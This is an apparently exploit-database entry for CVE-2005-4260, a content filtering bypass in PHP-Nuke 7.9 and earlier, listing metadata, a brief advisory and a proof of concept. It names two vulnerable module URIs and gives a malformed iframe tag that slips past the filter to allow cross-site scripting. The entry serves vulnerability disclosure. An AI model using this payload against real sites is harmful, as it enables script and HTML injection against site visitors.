PHP-Nuke 7.x - Content Filtering Bypass
Author: Maksymilian Arciemowicz
type: webapps
platform: php
port:
date_added: 2005-12-14
date_updated: 2017-11-14
verified: 1
codes: CVE-2005-4260;OSVDB-22122
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/15855/info
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
PHPNuke 7.9 and prior versions are reported to be vulnerable.
URI:
http://www.example.com/[DIR]/modules.php?name=Search
Insert:
<iframe src=http://www.example.com?phpnuke79 <
URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <